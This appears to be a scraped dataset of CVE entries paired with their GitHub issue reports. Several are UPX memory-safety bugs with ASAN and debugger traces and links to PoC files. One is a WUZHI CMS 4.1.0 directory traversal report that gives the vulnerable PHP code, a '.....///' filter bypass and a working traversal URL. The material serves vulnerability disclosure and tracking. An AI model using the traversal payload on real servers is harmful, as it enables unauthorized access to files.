Author: giantbranch of NSFOCUS Security Team ## What's the problem (or question)? A heap buffer overflow read in the latest commit of the devel branch ASAN reports: ``` ==21053==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6160000014bb at pc 0x000000755961 bp 0x7ffe38d0c080 sp 0x7ffe38d0c078 READ of size 1 at 0x6160000014bb thread T0 #0 0x755960 in acc_ua_get_be32(void const*) /src/upx-multi/src/./miniacc.h:6099:12 #1 0x755960 in get_be32(void const*) /src/upx-multi/src/./bele.h:78:12 #2 0x755960 in N_BELE_RTP::BEPolicy::get32(void const*) const /src/upx-multi/src/./bele_policy.h:115:18 #3 0x58a254 in Packer::get_te32(void const*) const /src/upx-multi/src/./packer.h:296:65 #4 0x58a254 in PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> > const*) /src/upx-multi/src/p_lx_elf.cpp:1601:32 #5 0x588959 in PackLinuxElf32::PackLinuxElf32help1(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:305:13 #6 0x5d70d4 in PackLinuxElf32Be::PackLinuxElf32Be(InputFile*) /src/upx-multi/src/./p_lx_elf.h:385:9 #7 0x5d70d4 in PackLinuxElf32armBe::PackLinuxElf32armBe(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4969:58 #8 0x6e50c0 in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /src/upx-multi/src/packmast.cpp:196:9 #9 0x6e8ff1 in PackMaster::getUnpacker(InputFile*) /src/upx-multi/src/packmast.cpp:248:18 #10 0x6e8ff1 in PackMaster::unpack(OutputFile*) /src/upx-multi/src/packmast.cpp:266:9 #11 0x75826b in do_one_file(char const*, char*) /src/upx-multi/src/work.cpp:160:12 #12 0x7597c2 in do_files(int, int, char**) /src/upx-multi/src/work.cpp:271:13 #13 0x555aed in main /src/upx-multi/src/main.cpp:1538:5 #14 0x7fcbbeced83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #15 0x41ce98 in _start (/out/upx-multi/upx-multi+0x41ce98) 0x6160000014bb is located 4 bytes to the right of 567-byte region [0x616000001280,0x6160000014b7) allocated by thread T0 here: #0 0x49519d in malloc (/out/upx-multi/upx-multi+0x49519d) #1 0x569797 in MemBuffer::alloc(unsigned long long) /src/upx-multi/src/mem.cpp:194:42 SUMMARY: AddressSanitizer: heap-buffer-overflow /src/upx-multi/src/./miniacc.h:6099:12 in acc_ua_get_be32(void const*) Shadow bytes around the buggy address: 0x0c2c7fff8240: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff8250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff8260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff8270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff8280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c2c7fff8290: 00 00 00 00 00 00 07[fa]fa fa fa fa fa fa fa fa 0x0c2c7fff82a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff82b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff82c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff82d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff82e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==21053==ABORTING ``` ## What should have happened? Check if the file is normal, exit if abnormal ## Do you have an idea for a solution? Add more checks ## How can we reproduce the issue? upx.out -d <poc_filename> poc: [poc-heap-buffer-overflow-2.tar.gz](https://github.com/upx/upx/files/4964580/poc-heap-buffer-overflow-2.tar.gz) ## Please tell us details about your environment. * UPX version used (`upx --version`): ``` upx 4.0.0-git-87b73e5cfdc1+ UCL data compression library 1.03 zlib data compression library 1.2.8 LZMA SDK version 4.43 Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer Copyright (C) 1996-2020 Laszlo Molnar Copyright (C) 2000-2020 John F. Reiser Copyright (C) 2002-2020 Jens Medoch Copyright (C) 1995-2005 Jean-loup Gailly and Mark Adler Copyright (C) 1999-2006 Igor Pavlov UPX comes with ABSOLUTELY NO WARRANTY; for details t ``` * Host Operating System and version: Ubuntu 16.04.2 LTS * Host CPU architecture: x86_64 * Target Operating System and version: same as Host * Target CPU architecture: same as Host
Heap buffer overflow in acc_ua_get_be32()
https://api.github.com/repos/upx/upx/issues/391/comments
1
2020-07-23T08:13:04Z
2020-08-06T06:29:39Z
https://github.com/upx/upx/issues/391
664,283,181
391
4,048
CVE-2020-27800
2022-08-25T20:15:08.677
A heap-based buffer over-read was discovered in the get_le32 function in bele.h in UPX 4.0.0 via a crafted Mach-O file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/395" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/395" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D3527302-7874-4400-B123-99C1CA6FE8EB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/upx/upx/issues/395
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
Author: giantbranch of NSFOCUS Security Team ## What's the problem (or question)? A heap buffer overflow read in the latest commit of the devel branch ASAN reports: ``` ==5614==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x624000007da0 at pc 0x000000757233 bp 0x7ffe125eb8e0 sp 0x7ffe125eb8d8 READ of size 4 at 0x624000007da0 thread T0 #0 0x757232 in get_le32(void const*) /src/upx-multi/src/./bele.h:164:12 #1 0x757232 in N_BELE_RTP::LEPolicy::get32(void const*) const /src/upx-multi/src/./bele_policy.h:192:18 #2 0x58a45e in Packer::get_te32(void const*) const /src/upx-multi/src/./packer.h:296:65 #3 0x58a45e in PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> > const*, unsignedint) /src/upx-multi/src/p_lx_elf.cpp:1610:32 #4 0x588a1e in PackLinuxElf32::PackLinuxElf32help1(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:305:13 #5 0x5d6504 in PackLinuxElf32Le::PackLinuxElf32Le(InputFile*) /src/upx-multi/src/./p_lx_elf.h:395:9 #6 0x5d6504 in PackLinuxElf32x86::PackLinuxElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4847:54 #7 0x5d6a4c in PackNetBSDElf32x86::PackNetBSDElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4884:56 #8 0x6e4df0 in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /src/upx-multi/src/packmast.cpp:191:9 #9 0x6e9771 in PackMaster::getUnpacker(InputFile*) /src/upx-multi/src/packmast.cpp:248:18 #10 0x6e9771 in PackMaster::unpack(OutputFile*) /src/upx-multi/src/packmast.cpp:266:9 #11 0x7589f8 in do_one_file(char const*, char*) /src/upx-multi/src/work.cpp:160:12 #12 0x759f42 in do_files(int, int, char**) /src/upx-multi/src/work.cpp:271:13 #13 0x555afd in main /src/upx-multi/src/main.cpp:1538:5 #14 0x7fc6ddc5d83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #15 0x41ce98 in _start (/out/upx-multi/upx-multi+0x41ce98) 0x624000007da2 is located 0 bytes to the right of 7330-byte region [0x624000006100,0x624000007da2) allocated by thread T0 here: #0 0x49519d in malloc (/out/upx-multi/upx-multi+0x49519d) #1 0x5697b7 in MemBuffer::alloc(unsigned long long) /src/upx-multi/src/mem.cpp:194:42 SUMMARY: AddressSanitizer: heap-buffer-overflow /src/upx-multi/src/./bele.h:164:12 in get_le32(void const*) Shadow bytes around the buggy address: 0x0c487fff8f60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c487fff8f70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c487fff8f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c487fff8f90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c487fff8fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c487fff8fb0: 00 00 00 00[02]fa fa fa fa fa fa fa fa fa fa fa 0x0c487fff8fc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c487fff8fd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c487fff8fe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c487fff8ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c487fff9000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==5614==ABORTING ``` ## What should have happened? Check if the file is normal, exit if abnormal ## Do you have an idea for a solution? Add more checks ## How can we reproduce the issue? upx.out -d <poc_filename> poc: [tests_192f7cabc11cc03830cccf5a14885865d1532c0d_.tar.gz](https://github.com/upx/upx/files/4970829/tests_192f7cabc11cc03830cccf5a14885865d1532c0d_.tar.gz) ## Please tell us details about your environment. * UPX version used (`upx --version`): ``` upx 4.0.0-git-8d1d605b3d8c+ UCL data compression library 1.03 zlib data compression library 1.2.8 LZMA SDK version 4.43 Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer Copyright (C) 1996-2020 Laszlo Molnar Copyright (C) 2000-2020 John F. Reiser Copyright (C) 2002-2020 Jens Medoch Copyright (C) 1995-2005 Jean-loup Gailly and Mark Adler Copyright (C) 1999-2006 Igor Pavlov UPX comes with ABSOLUTELY NO WARRANTY; for details type 'upx-multi -L'. ``` * Host Operating System and version: Ubuntu 16.04.2 LTS * Host CPU architecture: x86_64 * Target Operating System and version: same as Host * Target CPU architecture: same as Host
Another heap buffer overflow in get_le32()
https://api.github.com/repos/upx/upx/issues/395/comments
1
2020-07-24T08:10:02Z
2020-08-06T06:30:04Z
https://github.com/upx/upx/issues/395
664,994,296
395
4,049
CVE-2020-27801
2022-08-25T20:15:08.727
A heap-based buffer over-read was discovered in the get_le64 function in bele.h in UPX 4.0.0 via a crafted Mach-O file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/394" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/394" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D3527302-7874-4400-B123-99C1CA6FE8EB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/upx/upx/issues/394
[ "Exploit", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
Author: giantbranch of NSFOCUS Security Team ## What's the problem (or question)? A heap buffer overflow read in the latest commit of the devel branch ASAN reports: ``` ==4525==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fab6ae5cdd8 at pc 0x000000757297 bp 0x7fff2d255a60 sp 0x7fff2d255a58 READ of size 8 at 0x7fab6ae5cdd8 thread T0 #0 0x757296 in get_le64(void const*) /src/upx-multi/src/./bele.h:182:12 #1 0x757296 in N_BELE_RTP::LEPolicy::get64(void const*) const /src/upx-multi/src/./bele_policy.h:194:18 #2 0x5d0419 in Packer::get_te64(void const*) const /src/upx-multi/src/./packer.h:297:65 #3 0x5d0419 in PackLinuxElf64::unpack(OutputFile*) /src/upx-multi/src/p_lx_elf.cpp:4603:43 #4 0x6c82b0 in Packer::doUnpack(OutputFile*) /src/upx-multi/src/packer.cpp:107:5 #5 0x7589f8 in do_one_file(char const*, char*) /src/upx-multi/src/work.cpp:160:12 #6 0x759f42 in do_files(int, int, char**) /src/upx-multi/src/work.cpp:271:13 #7 0x555afd in main /src/upx-multi/src/main.cpp:1538:5 #8 0x7fab6992783f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #9 0x41ce98 in _start (/out/upx-multi/upx-multi+0x41ce98) 0x7fab6ae5cdd8 is located 0 bytes to the right of 132568-byte region [0x7fab6ae3c800,0x7fab6ae5cdd8) allocated by thread T0 here: #0 0x49519d in malloc (/out/upx-multi/upx-multi+0x49519d) #1 0x5697b7 in MemBuffer::alloc(unsigned long long) /src/upx-multi/src/mem.cpp:194:42 SUMMARY: AddressSanitizer: heap-buffer-overflow /src/upx-multi/src/./bele.h:182:12 in get_le64(void const*) Shadow bytes around the buggy address: 0x0ff5ed5c3960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff5ed5c3970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff5ed5c3980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff5ed5c3990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff5ed5c39a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0ff5ed5c39b0: 00 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa 0x0ff5ed5c39c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff5ed5c39d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff5ed5c39e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff5ed5c39f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff5ed5c3a00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==4525==ABORTING ``` ## What should have happened? Check if the file is normal, exit if abnormal ## Do you have an idea for a solution? Add more checks ## How can we reproduce the issue? upx.out -d <poc_filename> poc: [tests_a7c92caa967187b16a8927c29de0efee0d1f2ed5_.tar.gz](https://github.com/upx/upx/files/4970462/tests_a7c92caa967187b16a8927c29de0efee0d1f2ed5_.tar.gz) ``` $ ./src/upx.out -d ./tests_a7c92caa967187b16a8927c29de0efee0d1f2ed5_.tar.gz Ultimate Packer for eXecutables Copyright (C) 1996 - 2020 UPX git-8d1d60 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 24th 2020 File size Ratio Format Name -------------------- ------ ----------- ----------- Segmentation fault ``` ## Please tell us details about your environment. * UPX version used (`upx --version`): ``` upx 4.0.0-git-8d1d605b3d8c+ UCL data compression library 1.03 zlib data compression library 1.2.8 LZMA SDK version 4.43 Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer Copyright (C) 1996-2020 Laszlo Molnar Copyright (C) 2000-2020 John F. Reiser Copyright (C) 2002-2020 Jens Medoch Copyright (C) 1995-2005 Jean-loup Gailly and Mark Adler Copyright (C) 1999-2006 Igor Pavlov UPX comes with ABSOLUTELY NO WARRANTY; for details type 'upx-multi -L'. ``` * Host Operating System and version: Ubuntu 16.04.2 LTS * Host CPU architecture: x86_64 * Target Operating System and version: same as Host * Target CPU architecture: same as Host
Heap buffer overflow in get_le64()
https://api.github.com/repos/upx/upx/issues/394/comments
1
2020-07-24T06:42:22Z
2020-08-06T06:29:58Z
https://github.com/upx/upx/issues/394
664,953,164
394
4,050
CVE-2020-27802
2022-08-25T20:15:08.777
An floating point exception was discovered in the elf_lookup function in p_lx_elf.cpp in UPX 4.0.0 via a crafted Mach-O file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/393" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/393" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D3527302-7874-4400-B123-99C1CA6FE8EB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "369" ]
369
https://github.com/upx/upx/issues/393
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
Author: giantbranch of NSFOCUS Security Team ## What's the problem (or question)? Floating point exception was found in PackLinuxElf32::elf_lookup of p_lx_elf.cpp (the latest commit of the devel branch) through debugging,because of div 0 ``` ────────────────────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────────────────── ► 0x44d810 div dword ptr [rbp - 0xe8] ↓ ► 0x44d810 div dword ptr [rbp - 0xe8] ────────────────────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────────────────── 5395 { 5396 if (hashtab && dynsym && dynstr) { 5397 unsigned const nbucket = get_te32(&hashtab[0]); 5398 unsigned const *const buckets = &hashtab[2]; 5399 unsigned const *const chains = &buckets[nbucket]; ► 5400 unsigned const m = elf_hash(name) % nbucket; 5401 if (!nbucket 5402 || (unsigned)(file_size - ((char const *)buckets - (char const *)(void const *)file_image)) 5403 <= sizeof(unsigned)*nbucket ) { 5404 char msg[80]; snprintf(msg, sizeof(msg), 5405 "bad nbucket %#x\n", nbucket); ────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────── 00:0000│ rsp 0x7fffffffd2c0 —▸ 0x4e4017 ◂— pop r15 /* 'JNI_OnLoad' */ 01:0008│ 0x7fffffffd2c8 —▸ 0x817030 —▸ 0x53f580 ◂— add byte ptr [rax], al 02:0010│ 0x7fffffffd2d0 —▸ 0x7fffffffd2f0 —▸ 0x7fffffffd310 —▸ 0x7fffffffd380 —▸ 0x7fffffffd3c0 ◂— ... 03:0018│ 0x7fffffffd2d8 ◂— 0x0 04:0020│ 0x7fffffffd2e0 —▸ 0x817884 ◂— 0x1200 05:0028│ 0x7fffffffd2e8 —▸ 0x804fd8 (N_BELE_RTP::le_policy) —▸ 0x5e5be8 —▸ 0x4b8d50 (N_BELE_RTP::LEPolicy::~LEPolicy()) ◂— push rbp 06:0030│ 0x7fffffffd2f0 —▸ 0x7fffffffd310 —▸ 0x7fffffffd380 —▸ 0x7fffffffd3c0 —▸ 0x7fffffffd410 ◂— ... 07:0038│ 0x7fffffffd2f8 —▸ 0x4507b8 ◂— leave ──────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────── ► f 0 44d810 f 1 4377de PackLinuxElf32::PackLinuxElf32help1(InputFile*)+1632 f 2 450a5b PackLinuxElf32Le::PackLinuxElf32Le(InputFile*)+79 f 3 44b371 PackLinuxElf32x86::PackLinuxElf32x86(InputFile*)+35 f 4 44b47b PackBSDElf32x86::PackBSDElf32x86(InputFile*)+35 f 5 44b533 PackFreeBSDElf32x86::PackFreeBSDElf32x86(InputFile*)+35 f 6 49a936 f 7 49c2be PackMaster::getUnpacker(InputFile*)+40 f 8 49c362 PackMaster::unpack(OutputFile*)+32 f 9 4b9272 f 10 4b9663 Program received signal SIGFPE pwndbg> x /gx $rbp - 0xe8 0x7fffffffd2d8: 0x0000000000000000 ``` ASAN reports: ``` ==5426==ERROR: AddressSanitizer: FPE on unknown address 0x0000005d93dc (pc 0x0000005d93dc bp 0x7fffd6ee8580 sp 0x7fffd6ee8200 T0) #0 0x5d93dc in PackLinuxElf32::elf_lookup(char const*) const /src/upx-multi/src/p_lx_elf.cpp:5400:43 #1 0x588c27 in PackLinuxElf32::PackLinuxElf32help1(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:318:26 #2 0x5d5e74 in PackLinuxElf32Le::PackLinuxElf32Le(InputFile*) /src/upx-multi/src/./p_lx_elf.h:395:9 #3 0x5d5e74 in PackLinuxElf32x86::PackLinuxElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4838:54 #4 0x5d6261 in PackBSDElf32x86::PackBSDElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4855:50 #5 0x5d6261 in PackFreeBSDElf32x86::PackFreeBSDElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4866:58 #6 0x6e4460 in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /src/upx-multi/src/packmast.cpp:190:9 #7 0x6e8ff1 in PackMaster::getUnpacker(InputFile*) /src/upx-multi/src/packmast.cpp:248:18 #8 0x6e8ff1 in PackMaster::unpack(OutputFile*) /src/upx-multi/src/packmast.cpp:266:9 #9 0x75826b in do_one_file(char const*, char*) /src/upx-multi/src/work.cpp:160:12 #10 0x7597c2 in do_files(int, int, char**) /src/upx-multi/src/work.cpp:271:13 #11 0x555aed in main /src/upx-multi/src/main.cpp:1538:5 #12 0x7f999579b83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #13 0x41ce98 in _start (/out/upx-multi/upx-multi+0x41ce98) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: FPE /src/upx-multi/src/p_lx_elf.cpp:5400:43 in PackLinuxElf32::elf_lookup(char const*) const ==5426==ABORTING ``` ## What should have happened? Check if the file is normal, exit if abnormal ## Do you have an idea for a solution? Add more checks ## How can we reproduce the issue? upx.out -d <poc_filename> poc: [tests_1119229d81ae333c2b95061a6d3ab57e09049c74_.tar.gz](https://github.com/upx/upx/files/4964802/tests_1119229d81ae333c2b95061a6d3ab57e09049c74_.tar.gz) ## Please tell us details about your environment. * UPX version used (`upx --version`): ``` upx 4.0.0-git-87b73e5cfdc1+ UCL data compression library 1.03 zlib data compression library 1.2.8 LZMA SDK version 4.43 Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer Copyright (C) 1996-2020 Laszlo Molnar Copyright (C) 2000-2020 John F. Reiser Copyright (C) 2002-2020 Jens Medoch Copyright (C) 1995-2005 Jean-loup Gailly and Mark Adler Copyright (C) 1999-2006 Igor Pavlov UPX comes with ABSOLUTELY NO WARRANTY; for details t ``` * Host Operating System and version: Ubuntu 16.04.2 LTS * Host CPU architecture: x86_64 * Target Operating System and version: same as Host * Target CPU architecture: same as Host
Floating point exception in PackLinuxElf32::elf_lookup
https://api.github.com/repos/upx/upx/issues/393/comments
1
2020-07-23T09:02:02Z
2020-08-06T06:29:52Z
https://github.com/upx/upx/issues/393
664,311,420
393
4,051
CVE-2022-36168
2022-08-26T00:15:09.237
A directory traversal vulnerability was discovered in Wuzhicms 4.1.0. via /coreframe/app/attachment/admin/index.php:
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 2.7, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Cigar-Fasion/CVE/issues/1" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/202" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Cigar-Fasion/CVE/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/202" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wuzhicms:wuzhicms:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2B76E69A-B2F3-4359-A7C0-046CEE2FAEEB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/Cigar-Fasion/CVE/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Cigar-Fasion", "CVE" ]
A directory traversal vulnerability was discovered in WUZHI CMS 4.1.0. Directory traversal allows authenticated remote attackers to list files in any directory. Vulnerability in /coreframe/app/attachment/admin/index.php: ``` public function dir() { $dir = isset($GLOBALS['dir']) && trim($GLOBALS['dir']) ? str_replace(array('..\\', '../', './', '.\\'), '', trim($GLOBALS['dir'])) : ''; $dir = str_ireplace(array('%2F', '//'), '/', $dir); $lists = glob(ATTACHMENT_ROOT . $dir . '/' . '*'); if (!empty($lists)) rsort($lists); $cur_dir = str_replace(array(WWW_ROOT, DIRECTORY_SEPARATOR . DIRECTORY_SEPARATOR), array('', DIRECTORY_SEPARATOR), ATTACHMENT_ROOT . $dir . '/'); include $this->template('dir', M); } ``` Even if the "str_replace" function filters some characters, it can still bypass the blacklist with ".....///" 1.Log in as admin ![image](https://user-images.githubusercontent.com/57355558/178397342-0e5ccd4b-96fa-4e49-ba26-f0be3be4bad3.png) 2.Vulnerability trigger point `http://www.test.com/index.php?m=attachment&f=index&_su=wuzhicms&v=dir&dir=/.....///.....///.....///.....///` ![image](https://user-images.githubusercontent.com/57355558/178397270-731377d4-cb82-421a-bce0-597b02eebf67.png)
Wuzhicms v4.1.0 /coreframe/app/attachment/admin/index.php hava a directory traversal Vulnerability
https://api.github.com/repos/f4s1on/CVE/issues/1/comments
0
2022-07-12T03:17:32Z
2022-07-12T03:17:32Z
https://github.com/f4s1on/CVE/issues/1
1,301,479,795
1
4,052
CVE-2022-36168
2022-08-26T00:15:09.237
A directory traversal vulnerability was discovered in Wuzhicms 4.1.0. via /coreframe/app/attachment/admin/index.php:
